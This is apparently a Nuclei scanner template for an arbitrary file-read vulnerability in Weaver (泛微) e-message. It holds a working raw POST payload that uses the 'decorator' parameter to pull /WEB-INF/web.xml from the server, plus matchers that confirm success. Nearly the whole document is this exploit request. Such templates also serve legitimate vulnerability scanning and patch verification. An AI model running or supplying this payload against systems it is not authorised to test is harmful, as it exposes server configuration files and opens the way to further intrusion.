id: e-messageRead

info:
  name: 泛微e-message文件读取 
  author: Str1am
  severity: high
  tags: e-message,fileRead

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 43
        Connection: close
        Upgrade-Insecure-Requests: 1

        decorator=%2FWEB-INF%2Fweb.xml&confirm=true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "display-name"
          - "servlet"
        part: body
        condition: and